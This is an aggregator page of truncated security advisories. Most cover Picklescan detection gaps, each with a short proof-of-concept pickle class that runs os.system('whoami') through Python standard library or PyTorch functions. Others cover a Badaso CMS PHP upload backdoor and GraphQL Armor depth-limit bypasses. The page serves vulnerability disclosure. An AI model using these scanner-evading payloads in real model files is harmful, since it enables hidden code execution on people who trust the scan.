Security
Headlines
HeadlinesLatestCVEs

Source

ghsa

GHSA-3gf5-cxq9-w223: Picklescan is missing detection when calling built-in python idlelib.pyshell.ModifiedInterpreter.runcode

### Summary Using idlelib.pyshell.ModifiedInterpreter.runcode function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcode function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from idlelib.pyshell import ModifiedInterpreter from types import SimpleNamespace class EvilIdlelibPyshellModifiedInterpreterRuncode: def __reduce__(self): payload = "__import__('os').system('whoami')" fake_self = SimpleNamespace( locals={}, tkconsole=SimpleNamespace( executing=False, beginexecuting=str, cancele...

ghsa
#git#rce
GHSA-j343-8v2j-ff7w: Picklescan is missing detection when calling built-in python idlelib.pyshell.ModifiedInterpreter.runcommand

### Summary Using idlelib.pyshell.ModifiedInterpreter.runcommand function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcommand function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from idlelib.pyshell import ModifiedInterpreter from types import SimpleNamespace class EvilIdlelibPyshellModifiedInterpreterRuncommand: def __reduce__(self): payload = "__import__('os').system('whoami')" fake_self = SimpleNamespace( locals={}, tkconsole=SimpleNamespace(executing=False), rpcclt=None, debugger=None ) ...

GHSA-m869-42cg-3xwr: Picklescan is missing detection when calling built-in python idlelib.run.Executive.runcode

### Summary Using idlelib.run.Executive.runcode function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.run.Executive.runcode function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from idlelib.run import Executive from types import SimpleNamespace class EvilIdlelibRunExecutiveRuncode: def __reduce__(self): payload = "__import__('os').system('whoami')" fake_self = SimpleNamespace(locals={}) return Executive.runcode, (fake_self, payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Wha...

GHSA-p9w7-82w4-7q8m: Picklescan is missing detection when calling built-in python lib2to3.pgen2.pgen.ParserGenerator.make_label

### Summary Using lib2to3.pgen2.pgen.ParserGenerator.make_label function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to lib2to3.pgen2.pgen.ParserGenerator.make_label function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from types import SimpleNamespace from lib2to3.pgen2.pgen import ParserGenerator class EvilLib2to3Pgen2ParserGeneratorMakeLabel: def __reduce__(self): c = SimpleNamespace(labels=[], keywords={}, tokens={}) label = '""+__import__(\'os\').system(\'whoami\')' return ParserGenerator.make_label, (None, c, label) ``` ### Impact Who is impacted? Any organization or individual ...

GHSA-xp4f-hrf8-rxw7: Picklescan is missing detection when calling built-in python ensurepip._run_pip

### Summary Using ensurepip._run_pip function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to ensurepip._run_pip function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from ensurepip import _run_pip class EvilEnsurepipRunpip: def __reduce__(self): payload = "[(__import__('os').system('whoami'),)]" return _run_pip, (payload,) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loa...

GHSA-gqp9-jh35-439m: Badaso CMS file upload vulnerability

An arbitrary code execution vulnerability in Badaso CMS 2.9.11. The Media Manager allows authenticated users to upload files containing embedded PHP code via the file-upload endpoint, bypassing content-type validation. When such a file is accessed via its URL, the server executes the PHP payload, enabling an attacker to run arbitrary system commands and achieve full compromise of the underlying host. This has been demonstrated by embedding a backdoor within a PDF and renaming it with a .php extension.

GHSA-4whj-rm5r-c2v8: Picklescan is missing detection when calling pytorch function torch.utils.bottleneck.__main__.run_autograd_prof

### Summary Using torch.utils.bottleneck.\_\_main\_\_.run_autograd_prof function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.utils.bottleneck.__main__.run_autograd_prof function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import torch.utils.bottleneck.__main__ as bottleneck_main class EvilTorchUtilsBottleneckRunAutogradProf: def __reduce__(self): code = '__import__("os").system("whoami")' globs = {} return bottleneck_main.run_autograd_prof, (code, globs) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorc...

GHSA-224p-v68g-5g8f: GraphQL Armor Max-Depth Plugin Bypass via fragment caching

### Summary A query depth restriction using the max-depth can be bypassed if `ignoreIntrospection` is enabled (which is the default configuration) by naming your query/fragment `__schema`. ### Details In the `countDepth` function, we have the following code that calculates the depth of a used fragment: ```typescript } else if (node.kind == Kind.FRAGMENT_SPREAD) { if (this.visitedFragments.has(node.name.value)) { return this.visitedFragments.get(node.name.value) ?? 0; } else { this.visitedFragments.set(node.name.value, -1); } const fragment = this.context.getFragment(node.name.value); if (fragment) { let fragmentDepth; if (this.config.flattenFragments) { fragmentDepth = this.countDepth(fragment, parentDepth); } else { fragmentDepth = this.countDepth(fragment, parentDepth + 1); } depth = Math.max(depth, fragmentDepth); if (this.visitedFragments.get(node.name.value) === ...

GHSA-hmfr-rx46-4jx2: GraphQL Armor Max-Depth Plugin Bypass via Introspection Query Obfuscation

### Summary A query depth restriction using the `max-depth` property can be bypassed if `ignoreIntrospection` is enabled (which is the default configuration) by naming your query/fragment `__schema`. ### Details At the start of the `countDepth` function, we have the following check for the `ignoreIntrospection` option: ```typescript if (this.config.ignoreIntrospection && 'name' in node && node.name?.value === '__schema') { return 0; } ``` However, the `node` can be one of: `FieldNode`, `FragmentDefinitionNode`, `InlineFragmentNode`, `OperationDefinitionNode`, `FragmentSpreadNode`. For example, consider sending the following query: ```graphql query hello { books { title } } ``` This would create an `OperationDefinitionNode` where `node.name.value == 'hello'` The proper way to handle this is to check explicitly for the `__schema` field, which corresponds to a `FieldNode`. The fix is ```typescript if ( this.config.ignoreIntrospection && 'na...

GHSA-9xph-j2h6-g47v: Picklescan has a missing detection when calling built-in python library idlelib.calltip.get_entity

### Summary Using idlelib.calltip.get_entity function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.calltip.get_entity function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from idlelib.calltip import get_entity class EvilCalltipGetEntity: def __reduce__(self): # get_entity(expression) -> eval(expression) return get_entity, ("__import__('os').system('whoami')",) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains un...